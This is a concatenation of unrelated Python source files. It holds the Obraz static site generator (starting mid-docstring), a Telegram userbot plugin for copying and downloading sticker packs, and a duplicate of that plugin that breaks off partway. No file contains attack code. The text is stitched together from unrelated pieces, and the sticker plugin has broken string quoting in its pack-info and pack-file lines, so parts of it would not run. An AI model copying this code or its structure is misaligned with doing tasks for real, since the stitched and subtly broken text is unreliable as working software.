rebuild. -D --drafts Render posts in the _drafts folder. -H --host=HOSTNAME Listen at the given hostname. -P --port=PORT Listen at the given port. -b --baseurl=URL Serve the website from the given base URL. -q --quiet Be quiet. -t --trace Display traceback when an error occurs. -v --version Show version. -h --help Show help message. For documentation see <https://obraz.pirx.ru/>. """ import contextlib import os import re import shutil import sys import traceback from datetime import datetime from glob import glob from http.server import SimpleHTTPRequestHandler, HTTPServer from io import BytesIO from threading import Thread from time import sleep from typing import ( BinaryIO, Any, Callable, Iterable, Sequence, TypeVar, Optional, TypedDict, Union, cast, ) from urllib.request import pathname2url, url2pathname import yaml from docopt import docopt from jinja2 import Environment, FileSystemLoader from markdown import markdown __all__ = [ "file_filter", "generator", "loader", "processor", "template_filter", "template_renderer", ] PAGE_ENCODING = "UTF-8" class ConfigBase(TypedDict): source: str destination: str include: list[str] exclude: list[str] exclude_patterns: list[str] full_build_patterns: list[str] host: str port: str baseurl: str permalink: str class Config(ConfigBase, total=False): time: datetime drafts: bool force: bool trace: bool class File(TypedDict): url: str path: str class TemplateBase(TypedDict): content: str class Template(TemplateBase, total=False): layout: str class PageBase(Template): url: str class Page(PageBase, total=False): path: str published: bool raw_content: bool class PostBase(Page): date: datetime id: str class Post(PostBase, total=False): next: "Post" # type: ignore previous: "Post" # type: ignore tags: list[str] class SiteContents(TypedDict, total=False): files: list[File] pages: list[Page] posts: list[Post] tags: dict[str, list[Post]] class Site(SiteContents, Config): pass DEFAULT_CONFIG: ConfigBase = { "source": "./", "destination": "./_site", "include": [".htaccess"], "exclude": [], "exclude_patterns": [r"^[\.#].*", r".*~$", r".*\.sw[op]$"], "full_build_patterns": [ r"_layouts", r"_includes", ], "host": "localhost", "port": "8000", "baseurl": "", "permalink": "/{year}/{month}/{day}/{title}.html", } _quiet = False _loaders: list[Callable[[str, Config], Optional[SiteContents]]] = [] _processors: list[Callable[[Site], None]] = [] _render_string = lambda s, _context, _config: s _file_filters: dict[str, Callable[[str, Config], str]] = {} _template_filters: dict[str, Callable[[str, Config], str]] = {} _T = TypeVar("_T") def file_filter(extensions: Iterable[str]) -> Any: """Register a page content filter for file extensions.""" def wrapper(f: Callable[[str, Config], str]) -> Callable[[str, Config], str]: for ext in extensions: _file_filters[ext] = f return f return wrapper def template_filter(name: str) -> Any: """Register a template filter.""" def wrapper(f: Callable[[str, Config], str]) -> Callable[[str, Config], str]: _template_filters[name] = f return f return wrapper def template_renderer(f: Callable[[str, dict[str, Any], Config], str]) -> Any: """Set a custom template renderer.""" global _render_string _render_string = f return f def loader(f: Callable[[str, Config], Optional[SiteContents]]) -> Any: """Register a site source content loader.""" _loaders.insert(0, f) return f def processor(f: Callable[[Site], None]) -> Any: """Register a site content processor.""" _processors.insert(0, f) return f def generator(f: Callable[[Site], None]) -> Any: """Register a destination files generator for the site.""" _processors.append(f) return f def fallback_loader(f: Callable[[str, Config], Optional[SiteContents]]) -> Any: _loaders.append(f) return f def load_yaml_mapping(path: str) -> dict: try: with open(path, "rb") as fd: mapping = yaml.safe_load(fd) return mapping if mapping else {} except FileNotFoundError: return {} def merge(x1: _T, x2: _T) -> _T: if isinstance(x1, dict) and isinstance(x2, dict): res_dict = x1.copy() for k, v in x2.items(): if k in res_dict: res_dict[k] = merge(res_dict[k], v) else: res_dict[k] = v return cast(_T, res_dict) elif isinstance(x1, list) and isinstance(x2, list): res_list = x1.copy() res_list.extend(x2) return cast(_T, res_list) elif x1 == x2: return x1 else: raise ValueError(f"Cannot merge '{x1!r}' and '{x2!r}'") def all_source_files(source: str, destination: str) -> Iterable[str]: dst_base, dst_name = os.path.split(os.path.realpath(destination)) for source, dirs, files in os.walk(source): if os.path.realpath(source) == dst_base and dst_name in dirs: dirs.remove(dst_name) for filename in files: yield os.path.join(source, filename) def changed_files( source: str, destination: str, config: Config, poll_interval: int = 1 ) -> Iterable[list[str]]: times: dict[str, float] = {} while True: changed = [] for path in all_source_files(source, destination): rel_path = os.path.relpath(path, source) if not is_file_visible(rel_path, config): continue new = os.stat(path).st_mtime old = times.get(path) if not old or new > old: times[path] = new changed.append(path) if changed: yield changed sleep(poll_interval) def is_file_visible(path: str, config: Config) -> bool: """Check file name visibility according to site settings.""" parts = path.split(os.path.sep) exclude = config.get("exclude", []) exclude_patterns = config.get("exclude_patterns", []) if path in config.get("include", []): return True elif any(re.match(pattern, part) for pattern in exclude_patterns for part in parts): return False elif any(path.startswith(s) for s in exclude): return False else: return True def is_underscored(path: str) -> bool: parts = path.split(os.path.sep) return any(part.startswith("_") for part in parts) def path2url(path: str) -> str: m = re.match(r"(.*)[/\\]index.html?$", path) if m: path = m.group(1) + os.path.sep path = os.path.sep + path return pathname2url(path) def url2path(url: str) -> str: if url.endswith("/"): url += "index.html" return url2pathname(url).lstrip(os.path.sep) def make_dirs(path: str) -> None: with contextlib.suppress(FileExistsError): os.makedirs(path) def remove(path: str) -> None: with contextlib.suppress(FileExistsError): if os.path.isdir(path): shutil.rmtree(path) else: os.remove(path) def info(message: str) -> None: if not _quiet: log(message) def exception(e: BaseException, trace: bool) -> None: if trace: traceback.print_tb(e.__traceback__) log(f"Error: {e}") def log(message: str) -> None: sys.stderr.write(f"{message}\n") sys.stderr.flush() def progress(msg: str, xs: Sequence[_T]) -> Iterable[_T]: if _quiet: for x in xs: yield x else: size = len(xs) for i, x in enumerate(xs, 1): yield x s = f"{msg}: {int(i * 100 / size)}% ({i}/{size})" sys.stderr.write("\r" + s) sys.stderr.write("\n") def file_suffix(path: str) -> str: _, ext = os.path.splitext(path) return ext def object_name(f: Any) -> str: if f.__doc__: lines = f.__doc__.splitlines() for line in lines: line = line.strip() if line: return line.rstrip(".") return f.__name__ @template_filter("markdownify") @file_filter([".md", ".markdown"]) def markdown_filter(s: str, config: Config) -> str: return markdown(s) @fallback_loader def load_file(path: str, config: Config) -> Optional[SiteContents]: if not is_file_visible(path, config) or is_underscored(path): return None file: File = {"url": path2url(path), "path": path} return { "files": [file], } @template_renderer def jinja2_render_string(string: str, context: dict[str, Any], config: Config) -> str: includes = os.path.join(config["source"], "_includes") env = Environment(loader=FileSystemLoader(includes)) for name, f in _template_filters.items(): env.filters[name] = lambda s: f(s, config) t = env.from_string(string) return t.render(**context) def read_template(path: str) -> Optional[Template]: with open(path, "rb") as fd: if fd.read(3) != b"---": return None lines = [] while True: line = fd.readline() if re.match(b"^---\r?\n", line): break elif line == b"": return None lines.append(line) front_matter = BytesIO(b"".join(lines)) front_matter.name = path page = yaml.safe_load(front_matter) if not page: page = {} content = fd.read().decode(PAGE_ENCODING) page["content"] = content return page @loader def load_page(path: str, config: Config) -> Optional[SiteContents]: if not is_file_visible(path, config) or is_underscored(path): return None name, suffix = os.path.splitext(path) if suffix in _file_filters: dst = f"{name}.html" else: dst = path page = cast(Page, read_template(os.path.join(config["source"], path))) if not page: return None page["url"] = path2url(dst) page["path"] = path return {"pages": [page]} def read_post( path: str, date: datetime, title: str, config: Config ) -> Optional[SiteContents]: post = cast(Post, read_template(os.path.join(config["source"], path))) if not post: return None if "date" in post: date = post["date"] url_vars = { "year": f"{date.year:04}", "month": f"{date.month:02}", "day": f"{date.day:02}", "title": title, } post["url"] = pathname2url(config["permalink"].format(**url_vars)) post["path"] = path if "date" not in post: date_str = "{year}-{month}-{day}".format(**url_vars) post["date"] = datetime.strptime(date_str, "%Y-%m-%d") post["id"] = "/{year}/{month}/{day}/{title}".format(**url_vars) return { "posts": [post], "tags": dict((tag, [post]) for tag in post.get("tags", [])), } @loader def load_post(path: str, config: Config) -> Optional[SiteContents]: post_re = re.compile( r"(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})-" r"(?P<title>.+)" ) parts = path.split(os.path.sep) if "_posts" not in parts: return None if not is_file_visible(path, config): return None name, _ = os.path.splitext(os.path.basename(path)) m = post_re.match(name) if not m: return None date = datetime.strptime("{year}-{month}-{day}".format(**m.groupdict()), "%Y-%m-%d") return read_post(path, date, m.group("title"), config) @loader def load_draft(path: str, config: Config) -> Optional[SiteContents]: if not config.get("drafts"): return None if "_drafts" not in path.split(os.path.sep): return None if not is_file_visible(path, config): return None title, _ = os.path.splitext(os.path.basename(path)) return read_post(path, config.get("time", datetime.utcnow()), title, config) def render_layout(content: str, template: Template, site: Site) -> str: name = template.get("layout", "nil") if name == "nil": return content layout_file = os.path.join(site["source"], "_layouts", f"{name}.html") layout = read_template(layout_file) if not layout: raise Exception(f"Cannot load template: '{layout_file}'") layout_copy = cast(dict, layout.copy()) page_copy = cast(dict, template.copy()) page_copy.pop("layout", None) page_copy.pop("content", None) layout_copy.update(page_copy) layout = cast(Template, layout_copy) context = { "site": site, "page": layout, "content": content, } content = _render_string(layout["content"], context, site) return render_layout(content, layout, site) def render_page(page: Page, site: Site) -> str: context = { "site": site, "page": page, } content = page["content"] if not page.get("raw_content", False): content = _render_string(content, context, site) f = _file_filters.get(file_suffix(page.get("path", ""))) if f: content = f(content, site) page["content"] = content return render_layout(content, page, site) @processor def process_posts(site: Site) -> None: """Sort and interlink posts.""" posts: list[Post] = site.setdefault("posts", []) posts.sort(key=lambda p: p["date"], reverse=True) n = len(posts) for i, post in enumerate(posts): if i < n - 1: post["next"] = posts[i + 1] if i > 0: post["previous"] = posts[i - 1] def generate_page(page: Page, site: Site) -> None: if not page.get("published", True): return url = page["url"] dst = os.path.join(site["destination"], url2path(url)) make_dirs(os.path.dirname(dst)) with open(dst, "wb") as fd: fd.truncate() try: rendered = render_page(page, site) except Exception as e: raise Exception(f"Cannot render '{page.get('path')}': {e}") fd.write(rendered.encode(PAGE_ENCODING)) @generator def generate_pages(site: Site) -> None: """Generate pages with YAML front matter.""" posts = cast(list[Page], site.get("posts", [])) pages = site.get("pages", []) for page in progress("Generating pages", posts + pages): generate_page(page, site) @generator def generate_files(site: Site) -> None: """Copy static files.""" for file_dict in site.get("files", []): src = os.path.join(site["source"], file_dict["path"]) dst = os.path.join(site["destination"], url2path(file_dict["url"])) make_dirs(os.path.dirname(dst)) shutil.copy(src, dst) def load_plugins(source: str) -> None: plugins = sorted(glob(os.path.join(source, "_plugins", "*.py"))) n = 0 for plugin in plugins: with open(plugin, "rb") as fd: code = fd.read() exec(compile(code, plugin, "exec"), {}) n += 1 if n > 0: info(f"Loaded {n} plugins") def build(config: Config) -> None: site = load_site(config) generate_site(site) def build_delta(paths: Iterable[str], config: Config) -> None: site = load_site_files(paths, config) generate_site(site, clean=False) def load_site_files(paths: Iterable[str], config: Config) -> Site: source = config["source"] info("Loading source files...") site = cast(SiteContents, config.copy()) n = 0 for path in paths: rel_path = os.path.relpath(path, source) for f in _loaders: data = f(rel_path, config) if data: n += 1 site = merge(site, data) break info(f"Loaded {n} files") return cast(Site, site) def load_site(config: Config) -> Site: paths = all_source_files(config["source"], config["destination"]) return load_site_files(paths, config) def generate_site(site: Site, clean: bool = True) -> None: destination = site["destination"] marker = os.path.join(destination, ".obraz_destination") write_denied = os.path.exists(destination) and not os.path.exists(marker) if write_denied and not site.get("force"): raise Exception( f"Use --force to overwrite the contents " f"of '{destination}' not marked as destination " f"directory yet" ) make_dirs(destination) if clean: for name in os.listdir(destination): remove(os.path.join(destination, name)) with open(marker, "wb"): pass for f in _processors: msg = object_name(f) info(f"{msg}...") f(site) info("Site generated successfully") def make_server(config: Config) -> HTTPServer: host = config["host"] port = int(config["port"]) baseurl = config["baseurl"] class Handler(SimpleHTTPRequestHandler): def send_head(self) -> Union[BytesIO, BinaryIO, None]: if not self.path.startswith(baseurl): self.send_error(404, "File not found") return None self.path = self.path[len(baseurl) :] if not self.path.startswith("/"): self.path = "/" + self.path return SimpleHTTPRequestHandler.send_head(self) return HTTPServer((host, port), Handler) def serve(config: Config) -> None: build(config) server = make_server(config) os.chdir(config["destination"]) log_serving(config) server.serve_forever() def watch(config: Config) -> None: source = os.path.abspath(config["source"]) destination = os.path.abspath(config["destination"]) initial_dir = os.getcwd() serving = False server = make_server(config) for changed in changed_files(source, destination, config): if serving: info(f"Changed {len(changed)} files, regenerating...") server.shutdown() os.chdir(initial_dir) try: if full_build_required(changed, config) or not serving: build(config) else: build_delta(changed, config) except KeyboardInterrupt: raise except Exception as e: exception(e, bool(config.get("trace"))) os.chdir(destination) log_serving(config) thread = Thread(target=server.serve_forever) thread.daemon = True thread.start() if not serving: serving = True def log_serving(config: Config) -> None: url = "http://{host}:{port}{baseurl}".format(**config) if not url.endswith("/"): url += "/" info(f"Serving at {url}") def full_build_required(changed_paths: Iterable[str], config: Config) -> bool: patterns = config.get("full_build_patterns", []) source = os.path.abspath(config["source"]) for path in changed_paths: parts = os.path.relpath(path, source).split(os.path.sep) if any(re.match(pattern, part) for pattern in patterns for part in parts): return True return False def new_site(path: str) -> None: if os.path.exists(path) and os.listdir(path): raise Exception(f"Path '{path}' exists and is not empty") dev_source = os.path.join(os.path.dirname(__file__), "scaffold") if os.path.exists(dev_source): source = dev_source else: source = os.path.join(sys.prefix, "obraz/scaffold") shutil.copytree(source, path) info(f"New Obraz site installed in '{path}'") def obraz(argv: list[str]) -> None: opts = docopt(__doc__ or "", argv=argv, version="0.9.5") global _quiet _quiet = opts["--quiet"] try: if opts["new"]: new_site(opts["PATH"]) return copy = cast(dict, DEFAULT_CONFIG.copy()) source = opts["--source"] if opts["--source"] else "./" config_file = os.path.join(source, "_config.yml") copy.update(load_yaml_mapping(config_file)) copy["time"] = datetime.utcnow() for k, v in opts.items(): if k.startswith("--") and v: copy[k[2:]] = v config = cast(Config, copy) info(f'Source: {os.path.abspath(config["source"])}') info(f'Destination: {os.path.abspath(config["destination"])}') if not config.get("safe"): load_plugins(source) if opts["build"]: build(config) elif opts["serve"]: if opts["--watch"]: watch(config) else: serve(config) except KeyboardInterrupt: info("Interrupted") except BaseException as e: exception(e, opts["--trace"]) raise def main() -> None: sys.modules["obraz"] = sys.modules[__name__] try: obraz(sys.argv[1:]) except Exception: sys.exit(1) if __name__ == "__main__": main()
"""Make / Download Telegram Sticker Packs without installing Third Party applications Available Commands: .kang [Optional Emoji] .packinfo .getsticker""" from telethon import events from io import BytesIO from PIL import Image import asyncio import datetime from collections import defaultdict import math import os import requests import zipfile from telethon.errors.rpcerrorlist import StickersetInvalidError from telethon.errors import MessageNotModifiedError from telethon.tl.functions.account import UpdateNotifySettingsRequest from telethon.tl.functions.messages import GetStickerSetRequest from telethon.tl.types import ( DocumentAttributeFilename, DocumentAttributeSticker, InputMediaUploadedDocument, InputPeerNotifySettings, InputStickerSetID, InputStickerSetShortName, MessageMediaPhoto ) from userbot.utils import admin_cmd from userbot import ALIVE_NAME DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "Who is this" FILLED_UP_DADDY = "Invalid pack selected." @borg.on(admin_cmd(pattern="kang ?(.*)")) async def _(event): if event.fwd_from: return if not event.is_reply: await event.edit("Reply to a photo to add to my personal sticker pack.") return reply_message = await event.get_reply_message() sticker_emoji = "😎" input_str = event.pattern_match.group(1) if input_str: sticker_emoji = input_str user = await bot.get_me() if not user.username: user.username = user.id pack = 1 userid = event.from_id #packname = f"FRIDAY PACK" #packshortname = f"FRIDAY_{userid}_ns" # format: Uni_Borg_userid if userid == 1263617196: packname = f"@StarkGang Packs 🎭" packshortname = "StarkGangPack" else: packname = f"{user.username}'s {pack}" packshortname = f"FRIDAY_{userid}_Pack" await event.edit("`Wew ! I Love That Sticker ! Mind If i Kang It ?`") is_a_s = is_it_animated_sticker(reply_message) file_ext_ns_ion = "@FRIDAYOT.png" file = await borg.download_file(reply_message.media) uploaded_sticker = None if is_a_s: file_ext_ns_ion = "AnimatedSticker.tgs" uploaded_sticker = await borg.upload_file(file, file_name=file_ext_ns_ion) if userid == 813878981: packname = f"StarkGang Ka Pack" packshortname = "StarkGangisgreat" else: packname = f"{user.username}'s {pack}" packshortname = f"FRIDAY_{userid}" # format: Uni_Borg_userid elif not is_message_image(reply_message): await event.edit("Invalid message type") return else: with BytesIO(file) as mem_file, BytesIO() as sticker: resize_image(mem_file, sticker) sticker.seek(0) uploaded_sticker = await borg.upload_file(sticker, file_name=file_ext_ns_ion) await event.edit("Packing To Your Pack ! Please Wait!") async with borg.conversation("@Stickers") as bot_conv: now = datetime.datetime.now() dt = now + datetime.timedelta(minutes=1) if not await stickerset_exists(bot_conv, packshortname): await event.edit("`Creating a new pack!`") await silently_send_message(bot_conv, "/cancel") if is_a_s: response = await silently_send_message(bot_conv, "/newanimated") else: response = await silently_send_message(bot_conv, "/newpack") if "Yay!" not in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return response = await silently_send_message(bot_conv, packname) if not response.text.startswith("Alright!"): await event.edit(f"**Error**! @Stickers replied: {response.text}") return w = await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/publish") response = await silently_send_message(bot_conv, f"<{packname}>") await silently_send_message(bot_conv, "/skip") response = await silently_send_message(bot_conv, packshortname) if response.text == "Sorry, this short name is already taken.": await event.edit(f"**Error**! @Stickers replied: {response.text}") return else: await silently_send_message(bot_conv, "/cancel") await silently_send_message(bot_conv, "/addsticker") await silently_send_message(bot_conv, packshortname) await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if response.text == FILLED_UP_DADDY: while response.text == FILLED_UP_DADDY: pack += 1 prevv = int(pack) - 1 packname = f"{user.username}'s {pack}" packshortname = f"Vol_{pack}_with_{user.username}" #if userid == 948408212: # packname = f"{user.username}'s {pack}" # packshortname = "Vol._{pack}_FRIDAY_ke_locker_me" # else: # packname = f"Vol._{pack}_FRIDAY{userid}" #packshortname = f"Vol._{pack}_Friday_{userid}_ns" if not await stickerset_exists(bot_conv, packshortname): await event.edit("**Pack No. **" + str(prevv) + "** full! Making a new Pack, Vol. **" + str(pack)) if is_a_s: response = await silently_send_message(bot_conv, "/newanimated") else: response = await silently_send_message(bot_conv, "/newpack") if "Yay!" not in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return response = await silently_send_message(bot_conv, packname) if not response.text.startswith("Alright!"): await event.edit(f"**Error**! @Stickers replied: {response.text}") return w = await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/publish") response = await silently_send_message(bot_conv, f"<{packname}>") await silently_send_message(bot_conv, "/skip") response = await silently_send_message(bot_conv, packshortname) if response.text == "Sorry, this short name is already taken.": await event.edit(f"**Error**! @Stickers replied: {response.text}") return else: await event.edit("Pack No. " + str(prevv) + " full! Switching to Vol. " + str(pack)) await silently_send_message(bot_conv, "/addsticker") await silently_send_message(bot_conv, packshortname) await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/done") else: if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, response) await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/done") await event.edit(f"**Sticker Has Been Kanged SucessFully And Can Be Found** [Here](t.me/addstickers/{packshortname})") @borg.on(admin_cmd(pattern="packinfo")) async def _(event): if event.fwd_from: return if not event.is_reply: await event.edit("Reply to any sticker to get it's pack info.") return rep_msg = await event.get_reply_message() if not rep_msg.document: await event.edit("Reply to any sticker to get it's pack info.") return stickerset_attr_s = rep_msg.document.attributes stickerset_attr = find_instance(stickerset_attr_s, DocumentAttributeSticker) if not stickerset_attr.stickerset: await event.edit("sticker does not belong to a pack.") return get_stickerset = await borg( GetStickerSetRequest( InputStickerSetID( id=stickerset_attr.stickerset.id, access_hash=stickerset_attr.stickerset.access_hash ) ) ) pack_emojis = [] for document_sticker in get_stickerset.packs: if document_sticker.emoticon not in pack_emojis: pack_emojis.append(document_sticker.emoticon) await event.edit(f"**Sticker Title:** `{get_stickerset.set.title}\n`" f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" f"**Official:** `{get_stickerset.set.official}`\n" f"**Archived:** `{get_stickerset.set.archived}`\n" f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" f"**Emojis In Pack:** {" ".join(pack_emojis)}") @borg.on(admin_cmd(pattern="getsticker ?(.*)")) async def _(event): if event.fwd_from: return input_str = event.pattern_match.group(1) if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY): os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY) if event.reply_to_msg_id: reply_message = await event.get_reply_message() # https://gist.github.com/udf/e4e3dbb2e831c8b580d8fddd312714f7 if not reply_message.sticker: return sticker = reply_message.sticker sticker_attrib = find_instance(sticker.attributes, DocumentAttributeSticker) if not sticker_attrib.stickerset: await event.reply("This sticker is not part of a pack") return is_a_s = is_it_animated_sticker(reply_message) file_ext_ns_ion = "webp" file_caption = "https://t.me/RoseSupport/33801" if is_a_s: file_ext_ns_ion = "tgs" file_caption = "Forward the ZIP file to @AnimatedStickersRoBot to get lottIE JSON containing the vector information." sticker_set = await borg(GetStickerSetRequest(sticker_attrib.stickerset)) pack_file = os.path.join(Config.TMP_DOWNLOAD_DIRECTORY, sticker_set.set.short_name, "pack.txt") if os.path.isfile(pack_file): os.remove(pack_file) # Sticker emojis are retrieved as a mapping of # <emoji>: <list of document ids that have this emoji> # So we need to build a mapping of <document id>: <list of emoji> # Thanks, Durov emojis = defaultdict(str) for pack in sticker_set.packs: for document_id in pack.documents: emojis[document_id] += pack.emoticon async def download(sticker, emojis, path, file): await borg.download_media(sticker, file=os.path.join(path, file)) with open(pack_file, "a") as f: f.write(f"{{"image_file": "{file}','emojis':{emojis[sticker.id]}}},") pending_tasks = [ asyncio.ensure_future( download(document, emojis, Config.TMP_DOWNLOAD_DIRECTORY + sticker_set.set.short_name, f"{i:03d}.{file_ext_ns_ion}") ) for i, document in enumerate(sticker_set.documents) ] await event.edit(f"Downloading {sticker_set.set.count} sticker(s) to .{Config.TMP_DOWNLOAD_DIRECTORY}{sticker_set.set.short_name}...") num_tasks = len(pending_tasks) while 1: done, pending_tasks = await asyncio.wait(pending_tasks, timeout=2.5, return_when=asyncio.FIRST_COMPLETED) try: await event.edit( f"Downloaded {num_tasks - len(pending_tasks)}/{sticker_set.set.count}") except MessageNotModifiedError: pass if not pending_tasks: break await event.edit("Downloading to my local completed") # https://gist.github.com/udf/e4e3dbb2e831c8b580d8fddd312714f7 directory_name = Config.TMP_DOWNLOAD_DIRECTORY + sticker_set.set.short_name zipf = zipfile.ZipFile(directory_name + ".zip", "w", zipfile.ZIP_DEFLATED) zipdir(directory_name, zipf) zipf.close() await borg.send_file( event.chat_id, directory_name + ".zip", caption=file_caption, force_document=True, allow_cache=False, reply_to=event.message.id, progress_callback=progress ) try: os.remove(directory_name + ".zip") os.remove(directory_name) except: pass await event.edit("task Completed") await asyncio.sleep(3) await event.delete() else: await event.edit("TODO: Not Implemented") # Helpers def is_it_animated_sticker(message): try: if message.media and message.media.document: mime_type = message.media.document.mime_type if "tgsticker" in mime_type: return True else: return False else: return False except: return False def is_message_image(message): if message.media: if isinstance(message.media, MessageMediaPhoto): return True if message.media.document: if message.media.document.mime_type.split("/")[0] == "image": return True return False return False async def silently_send_message(conv, text): await conv.send_message(text) response = await conv.get_response() await conv.mark_read(message=response) return response async def stickerset_exists(conv, setname): try: await borg(GetStickerSetRequest(InputStickerSetShortName(setname))) response = await silently_send_message(conv, "/addsticker") if response.text == "Invalid pack selected.": await silently_send_message(conv, "/cancel") return False await silently_send_message(conv, "/cancel") return True except StickersetInvalidError: return False def resize_image(image, save_locaton): """ Copyright Rhyse Simpson: https://github.com/skittles9823/SkittBot/blob/master/tg_bot/modules/stickers.py """ im = Image.open(image) maxsize = (512, 512) if (im.width and im.height) < 512: size1 = im.width size2 = im.height if im.width > im.height: scale = 512 / size1 size1new = 512 size2new = size2 * scale else: scale = 512 / size2 size1new = size1 * scale size2new = 512 size1new = math.floor(size1new) size2new = math.floor(size2new) sizenew = (size1new, size2new) im = im.resize(sizenew) else: im.thumbnail(maxsize) im.save(save_locaton, "PNG") def progress(current, total): logger.info("Uploaded: {} of {}\nCompleted {}".format(current, total, (current / total) * 100)) def find_instance(items, class_or_tuple): for item in items: if isinstance(item, class_or_tuple): return item return None def zipdir(path, ziph): # ziph is zipfile handle for root, dirs, files in os.walk(path): for file in files: ziph.write(os.path.join(root, file)) os.remove(os.path.join(root, file))
"""Make / Download Telegram Sticker Packs without installing Third Party applications Available Commands: .kang [Optional Emoji] .packinfo .getsticker""" from telethon import events from io import BytesIO from PIL import Image import asyncio import datetime from collections import defaultdict import math import os import requests import zipfile from telethon.errors.rpcerrorlist import StickersetInvalidError from telethon.errors import MessageNotModifiedError from telethon.tl.functions.account import UpdateNotifySettingsRequest from telethon.tl.functions.messages import GetStickerSetRequest from telethon.tl.types import ( DocumentAttributeFilename, DocumentAttributeSticker, InputMediaUploadedDocument, InputPeerNotifySettings, InputStickerSetID, InputStickerSetShortName, MessageMediaPhoto ) from userbot.utils import admin_cmd from userbot import ALIVE_NAME DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "Who is this" FILLED_UP_DADDY = "Invalid pack selected." @borg.on(admin_cmd(pattern="kang ?(.*)")) async def _(event): if event.fwd_from: return if not event.is_reply: await event.edit("Reply to a photo to add to my personal sticker pack.") return reply_message = await event.get_reply_message() sticker_emoji = "😎" input_str = event.pattern_match.group(1) if input_str: sticker_emoji = input_str user = await bot.get_me() if not user.username: user.username = user.id pack = 1 userid = event.from_id #packname = f"FRIDAY PACK" #packshortname = f"FRIDAY_{userid}_ns" # format: Uni_Borg_userid if userid == 1263617196: packname = f"@StarkGang Packs 🎭" packshortname = "StarkGangPack" else: packname = f"{user.username}'s {pack}" packshortname = f"FRIDAY_{userid}_Pack" await event.edit("`Wew ! I Love That Sticker ! Mind If i Kang It ?`") is_a_s = is_it_animated_sticker(reply_message) file_ext_ns_ion = "@FRIDAYOT.png" file = await borg.download_file(reply_message.media) uploaded_sticker = None if is_a_s: file_ext_ns_ion = "AnimatedSticker.tgs" uploaded_sticker = await borg.upload_file(file, file_name=file_ext_ns_ion) if userid == 813878981: packname = f"StarkGang Ka Pack" packshortname = "StarkGangisgreat" else: packname = f"{user.username}'s {pack}" packshortname = f"FRIDAY_{userid}" # format: Uni_Borg_userid elif not is_message_image(reply_message): await event.edit("Invalid message type") return else: with BytesIO(file) as mem_file, BytesIO() as sticker: resize_image(mem_file, sticker) sticker.seek(0) uploaded_sticker = await borg.upload_file(sticker, file_name=file_ext_ns_ion) await event.edit("Packing To Your Pack ! Please Wait!") async with borg.conversation("@Stickers") as bot_conv: now = datetime.datetime.now() dt = now + datetime.timedelta(minutes=1) if not await stickerset_exists(bot_conv, packshortname): await event.edit("`Creating a new pack!`") await silently_send_message(bot_conv, "/cancel") if is_a_s: response = await silently_send_message(bot_conv, "/newanimated") else: response = await silently_send_message(bot_conv, "/newpack") if "Yay!" not in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return response = await silently_send_message(bot_conv, packname) if not response.text.startswith("Alright!"): await event.edit(f"**Error**! @Stickers replied: {response.text}") return w = await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/publish") response = await silently_send_message(bot_conv, f"<{packname}>") await silently_send_message(bot_conv, "/skip") response = await silently_send_message(bot_conv, packshortname) if response.text == "Sorry, this short name is already taken.": await event.edit(f"**Error**! @Stickers replied: {response.text}") return else: await silently_send_message(bot_conv, "/cancel") await silently_send_message(bot_conv, "/addsticker") await silently_send_message(bot_conv, packshortname) await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if response.text == FILLED_UP_DADDY: while response.text == FILLED_UP_DADDY: pack += 1 prevv = int(pack) - 1 packname = f"{user.username}'s {pack}" packshortname = f"Vol_{pack}_with_{user.username}" #if userid == 948408212: # packname = f"{user.username}'s {pack}" # packshortname = "Vol._{pack}_FRIDAY_ke_locker_me" # else: # packname = f"Vol._{pack}_FRIDAY{userid}" #packshortname = f"Vol._{pack}_Friday_{userid}_ns" if not await stickerset_exists(bot_conv, packshortname): await event.edit("**Pack No. **" + str(prevv) + "** full! Making a new Pack, Vol. **" + str(pack)) if is_a_s: response = await silently_send_message(bot_conv, "/newanimated") else: response = await silently_send_message(bot_conv, "/newpack") if "Yay!" not in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return response = await silently_send_message(bot_conv, packname) if not response.text.startswith("Alright!"): await event.edit(f"**Error**! @Stickers replied: {response.text}") return w = await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/publish") response = await silently_send_message(bot_conv, f"<{packname}>") await silently_send_message(bot_conv, "/skip") response = await silently_send_message(bot_conv, packshortname) if response.text == "Sorry, this short name is already taken.": await event.edit(f"**Error**! @Stickers replied: {response.text}") return else: await event.edit("Pack No. " + str(prevv) + " full! Switching to Vol. " + str(pack)) await silently_send_message(bot_conv, "/addsticker") await silently_send_message(bot_conv, packshortname) await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True 